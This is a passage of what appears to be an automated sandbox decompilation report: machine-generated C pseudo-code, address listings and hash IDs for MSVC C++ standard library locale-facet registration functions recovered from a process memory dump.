                                                                                                																															_v16 = _t427;
                                                                                                																															_t415 = E00F78A40(_a8, E00F789D0());
                                                                                                																															__eflags = _t415;
                                                                                                																															if(_t415 != 0) {
                                                                                                																																L68:
                                                                                                																																E00F8573E( &_v20);
                                                                                                																																return E00FB388C(_t415);
                                                                                                																															} else {
                                                                                                																																__eflags = _t427;
                                                                                                																																if(__eflags == 0) {
                                                                                                																																	_push(_a8);
                                                                                                																																	_push( &_v16);
                                                                                                																																	__eflags = E00F88C25(_t415, _t427, __eflags) - 0xffffffff;
                                                                                                																																	if(__eflags == 0) {
                                                                                                																																		E00F78FE0(__eflags);
                                                                                                																																		asm("int3");
                                                                                                																																		_push(8);
                                                                                                																																		E00FB38B2(0xfb6ebe, _t415, _t427);
                                                                                                																																		E00F856E6( &_v20, 0);
                                                                                                																																		_t428 =  *0xfd0b1c; // 0x0
                                                                                                																																		_v4 = _v4 & 0x00000000;
                                                                                                																																		_v16 = _t428;
                                                                                                																																		_t416 = E00F78A40(_a8, E00F789D0());
                                                                                                																																		__eflags = _t416;
                                                                                                																																		if(_t416 != 0) {
                                                                                                																																			L75:
                                                                                                																																			E00F8573E( &_v20);
                                                                                                																																			return E00FB388C(_t416);
                                                                                                																																		} else {
                                                                                                																																			__eflags = _t428;
                                                                                                																																			if(__eflags == 0) {
                                                                                                																																				_push(_a8);
                                                                                                																																				_push( &_v16);
                                                                                                																																				_t256 = E00F88C91(_t416, _t428, __eflags);
                                                                                                																																				_pop(_t370);
                                                                                                																																				__eflags = _t256 - 0xffffffff;
                                                                                                																																				if(__eflags == 0) {
                                                                                                																																					E00F78FE0(__eflags);
                                                                                                																																					asm("int3");
                                                                                                																																					_push(_t428);
                                                                                                																																					_t429 = _t370;
                                                                                                																																					_t134 = _t429 + 0x10;
                                                                                                																																					 *_t134 =  *(_t429 + 0x10) & 0x00000000;
                                                                                                																																					__eflags =  *_t134;
                                                                                                																																					 *((intOrPtr*)(_t429 + 0x14)) = 7;
                                                                                                																																					 *_t429 = 0;
                                                                                                																																					E00F8D9F3(_v40);
                                                                                                																																					return _t429;
                                                                                                																																				} else {
                                                                                                																																					_t416 = _v16;
                                                                                                																																					_v16 = _t416;
                                                                                                																																					_v4 = 1;
                                                                                                																																					E00F85472(_t416);
                                                                                                																																					 *0xfb81fc();
                                                                                                																																					 *((intOrPtr*)( *((intOrPtr*)( *_t416 + 4))))();
                                                                                                																																					 *0xfd0b1c = _t416;
                                                                                                																																					goto L75;
                                                                                                																																				}
                                                                                                																																			} else {
                                                                                                																																				_t416 = _t428;
                                                                                                																																				goto L75;
                                                                                                																																			}
                                                                                                																																		}
                                                                                                																																	} else {
                                                                                                																																		_t415 = _v16;
                                                                                                																																		_v16 = _t415;
                                                                                                																																		_v4 = 1;
                                                                                                																																		E00F85472(_t415);
                                                                                                																																		 *0xfb81fc();
                                                                                                																																		 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 4))))();
                                                                                                																																		 *0xfd0ae8 = _t415;
                                                                                                																																		goto L68;
                                                                                                																																	}
                                                                                                																																} else {
                                                                                                																																	_t415 = _t427;
                                                                                                																																	goto L68;
                                                                                                																																}
                                                                                                																															}
                                                                                                																														} else {
                                                                                                																															_t414 = _v16;
                                                                                                																															_v16 = _t414;
                                                                                                																															_v4 = 1;
                                                                                                																															E00F85472(_t414);
                                                                                                																															 *0xfb81fc();
                                                                                                																															 *((intOrPtr*)( *((intOrPtr*)( *_t414 + 4))))();
                                                                                                																															 *0xfd0b18 = _t414;
                                                                                                																															goto L61;
                                                                                                																														}
                                                                                                																													} else {
                                                                                                																														_t414 = _t426;
                                                                                                																														goto L61;
                                                                                                																													}
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t413 = _v16;
                                                                                                																												_v16 = _t413;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t413);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 4))))();
                                                                                                																												 *0xfd0afc = _t413;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t413 = _t425;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t412 = _v16;
                                                                                                																									_v16 = _t412;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t412);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t412 + 4))))();
                                                                                                																									 *0xfd0af8 = _t412;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t412 = _t424;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t411 = _v16;
                                                                                                																						_v16 = _t411;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t411);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t411 + 4))))();
                                                                                                																						 *0xfd0af4 = _t411;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t411 = _t423;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t410 = _v16;
                                                                                                																			_v16 = _t410;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t410);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t410 + 4))))();
                                                                                                																			 *0xfd0ae0 = _t410;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t410 = _t422;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t409 = _v16;
                                                                                                																_v16 = _t409;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t409);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t409 + 4))))();
                                                                                                																 *0xfd0ae4 = _t409;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t409 = _t421;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t408 = _v16;
                                                                                                													_v16 = _t408;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t408);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t408 + 4))))();
                                                                                                													 *0xfd0b10 = _t408;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t408 = _t420;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t407 = _v16;
                                                                                                										_v16 = _t407;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t407);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t407 + 4))))();
                                                                                                										 *0xfd0b14 = _t407;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t407 = _t419;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t406 = _v16;
                                                                                                							_v16 = _t406;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t406);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t406 + 4))))();
                                                                                                							 *0xfd0adc = _t406;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t406 = _t418;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}

































                                                                                                0x00f87418
                                                                                                0x00f8741f
                                                                                                0x00f87429
                                                                                                0x00f8742e
                                                                                                0x00f87439
                                                                                                0x00f8743d
                                                                                                0x00f87449
                                                                                                0x00f8744e
                                                                                                0x00f87452
                                                                                                0x00f87497
                                                                                                0x00f8749a
                                                                                                0x00f874a6
                                                                                                0x00f87454
                                                                                                0x00f87456
                                                                                                0x00f8745c
                                                                                                0x00f87462
                                                                                                0x00f8746a
                                                                                                0x00f8746d
                                                                                                0x00f874a7
                                                                                                0x00f874ac
                                                                                                0x00f874ad
                                                                                                0x00f874b4
                                                                                                0x00f874be
                                                                                                0x00f874c3
                                                                                                0x00f874ce
                                                                                                0x00f874d2
                                                                                                0x00f874e3
                                                                                                0x00f874e5
                                                                                                0x00f874e7
                                                                                                0x00f8752c
                                                                                                0x00f8752f
                                                                                                0x00f8753b
                                                                                                0x00f874e9
                                                                                                0x00f874e9
                                                                                                0x00f874eb
                                                                                                0x00f874f1
                                                                                                0x00f874f7
                                                                                                0x00f874ff
                                                                                                0x00f87502
                                                                                                0x00f8753c
                                                                                                0x00f87541
                                                                                                0x00f87542
                                                                                                0x00f87549
                                                                                                0x00f87553
                                                                                                0x00f87558
                                                                                                0x00f87563
                                                                                                0x00f87567
                                                                                                0x00f87578
                                                                                                0x00f8757a
                                                                                                0x00f8757c
                                                                                                0x00f875c1
                                                                                                0x00f875c4
                                                                                                0x00f875d0
                                                                                                0x00f8757e
                                                                                                0x00f8757e
                                                                                                0x00f87580
                                                                                                0x00f87586
                                                                                                0x00f8758c
                                                                                                0x00f87594
                                                                                                0x00f87597
                                                                                                0x00f875d1
                                                                                                0x00f875d6
                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f8760d
                                                                                                0x00f8760f
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F8741F
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F87429
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F8747A
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F8749A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: e83439fe1edba2d60b992939820f14c6496662d1fee28f3fe0a4121003d532f0
                                                                                                • Instruction ID: bd1cb26ebb3889e44c3611cc8c56ed4e0ffa38261dc60bdfbfbe5ed00315d154
                                                                                                • Opcode Fuzzy Hash: e83439fe1edba2d60b992939820f14c6496662d1fee28f3fe0a4121003d532f0
                                                                                                • Instruction Fuzzy Hash: 1501A13690021ADBCB05FB64CC457EDBB71AF84760F68400AE405AB291DF38DA02AB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E00F916D9(void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t23;
                                                                                                				void* _t28;
                                                                                                				intOrPtr* _t45;
                                                                                                				intOrPtr* _t52;
                                                                                                				intOrPtr* _t53;
                                                                                                				void* _t55;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t55 - 0x14, 0);
                                                                                                				_t52 =  *0xfd0b60; // 0x0
                                                                                                				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
                                                                                                				 *((intOrPtr*)(_t55 - 0x10)) = _t52;
                                                                                                				_t23 = E00F78A40( *((intOrPtr*)(_t55 + 8)), E00F789D0());
                                                                                                				_t50 = _t23;
                                                                                                				if(_t23 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t55 - 0x14);
                                                                                                					return E00FB388C(_t50);
                                                                                                				} else {
                                                                                                					if(_t52 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t55 + 8)));
                                                                                                						_push(_t55 - 0x10);
                                                                                                						_t28 = E00F91BC4(_t50, _t52, __eflags);
                                                                                                						_pop(_t45);
                                                                                                						__eflags = _t28 - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(4);
                                                                                                							E00FB38B2(0xfb7295, _t50, _t52);
                                                                                                							_t53 = _t45;
                                                                                                							 *((intOrPtr*)(_t55 - 0x10)) = _t53;
                                                                                                							 *((intOrPtr*)(_t53 + 4)) =  *((intOrPtr*)(_t55 + 0xc));
                                                                                                							_push( *((intOrPtr*)(_t55 + 8)));
                                                                                                							_t17 = _t55 - 4;
                                                                                                							 *_t17 =  *(_t55 - 4) & 0x00000000;
                                                                                                							__eflags =  *_t17;
                                                                                                							 *_t53 = 0xfb9ac0;
                                                                                                							E00F929F5(_t45, _t50, _t53,  *_t17);
                                                                                                							return E00FB388C(_t53);
                                                                                                						} else {
                                                                                                							_t50 =  *((intOrPtr*)(_t55 - 0x10));
                                                                                                							 *((intOrPtr*)(_t55 - 0x10)) = _t50;
                                                                                                							 *(_t55 - 4) = 1;
                                                                                                							E00F85472(_t50);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
                                                                                                							 *0xfd0b60 = _t50;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t50 = _t52;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}









                                                                                                0x00f916d9
                                                                                                0x00f916e0
                                                                                                0x00f916ea
                                                                                                0x00f916ef
                                                                                                0x00f916fa
                                                                                                0x00f916fe
                                                                                                0x00f9170a
                                                                                                0x00f9170f
                                                                                                0x00f91713
                                                                                                0x00f91758
                                                                                                0x00f9175b
                                                                                                0x00f91767
                                                                                                0x00f91715
                                                                                                0x00f91717
                                                                                                0x00f9171d
                                                                                                0x00f91723
                                                                                                0x00f91724
                                                                                                0x00f9172a
                                                                                                0x00f9172b
                                                                                                0x00f9172e
                                                                                                0x00f91768
                                                                                                0x00f9176d
                                                                                                0x00f9176e
                                                                                                0x00f91775
                                                                                                0x00f9177a
                                                                                                0x00f9177c
                                                                                                0x00f91782
                                                                                                0x00f91785
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f9178c
                                                                                                0x00f91792
                                                                                                0x00f9179e
                                                                                                0x00f91730
                                                                                                0x00f91730
                                                                                                0x00f91733
                                                                                                0x00f91737
                                                                                                0x00f9173b
                                                                                                0x00f91748
                                                                                                0x00f91750
                                                                                                0x00f91752
                                                                                                0x00000000
                                                                                                0x00f91752
                                                                                                0x00f91719
                                                                                                0x00f91719
                                                                                                0x00000000
                                                                                                0x00f91719
                                                                                                0x00f91717

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F916E0
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F916EA
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F9173B
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F9175B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: 6fa6a7eb795c70615730fffd95c315202ff7adf23022b6cfdf915b64316543f2
                                                                                                • Instruction ID: 8be6e68d935570dd4b31c1f1b320a5416546e2e8eb530a0c7432864efbd7992e
                                                                                                • Opcode Fuzzy Hash: 6fa6a7eb795c70615730fffd95c315202ff7adf23022b6cfdf915b64316543f2
                                                                                                • Instruction Fuzzy Hash: 0C01C43990011A9BDF05EBA4CC556EE77B1BF84760F54411AF405AB291DF389E01FB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F91644(void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t35;
                                                                                                				void* _t51;
                                                                                                				signed int _t78;
                                                                                                				signed int _t87;
                                                                                                				signed int _t89;
                                                                                                				signed int _t90;
                                                                                                				signed int _t91;
                                                                                                				void* _t94;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t94 - 0x14, 0);
                                                                                                				_t89 =  *0xfd0b5c; // 0x0
                                                                                                				 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
                                                                                                				 *(_t94 - 0x10) = _t89;
                                                                                                				_t35 = E00F78A40( *((intOrPtr*)(_t94 + 8)), E00F789D0());
                                                                                                				_t86 = _t35;
                                                                                                				if(_t35 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t94 - 0x14);
                                                                                                					return E00FB388C(_t86);
                                                                                                				} else {
                                                                                                					if(_t89 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t94 + 8)));
                                                                                                						_push(_t94 - 0x10);
                                                                                                						__eflags = E00F91B58(_t86, _t89, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t86, _t89);
                                                                                                							E00F856E6(_t94 - 0x14, 0);
                                                                                                							_t90 =  *0xfd0b60; // 0x0
                                                                                                							 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
                                                                                                							 *(_t94 - 0x10) = _t90;
                                                                                                							_t87 = E00F78A40( *((intOrPtr*)(_t94 + 8)), E00F789D0());
                                                                                                							__eflags = _t87;
                                                                                                							if(_t87 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E(_t94 - 0x14);
                                                                                                								return E00FB388C(_t87);
                                                                                                							} else {
                                                                                                								__eflags = _t90;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push( *((intOrPtr*)(_t94 + 8)));
                                                                                                									_push(_t94 - 0x10);
                                                                                                									_t51 = E00F91BC4(_t87, _t90, __eflags);
                                                                                                									_pop(_t78);
                                                                                                									__eflags = _t51 - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(4);
                                                                                                										E00FB38B2(0xfb7295, _t87, _t90);
                                                                                                										_t91 = _t78;
                                                                                                										 *(_t94 - 0x10) = _t91;
                                                                                                										 *((intOrPtr*)(_t91 + 4)) =  *((intOrPtr*)(_t94 + 0xc));
                                                                                                										_push( *((intOrPtr*)(_t94 + 8)));
                                                                                                										_t29 = _t94 - 4;
                                                                                                										 *_t29 =  *(_t94 - 4) & 0x00000000;
                                                                                                										__eflags =  *_t29;
                                                                                                										 *_t91 = 0xfb9ac0;
                                                                                                										E00F929F5(_t78, _t87, _t91,  *_t29);
                                                                                                										return E00FB388C(_t91);
                                                                                                									} else {
                                                                                                										_t87 =  *(_t94 - 0x10);
                                                                                                										 *(_t94 - 0x10) = _t87;
                                                                                                										 *(_t94 - 4) = 1;
                                                                                                										E00F85472(_t87);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 4))))();
                                                                                                										 *0xfd0b60 = _t87;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t87 = _t90;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t86 =  *(_t94 - 0x10);
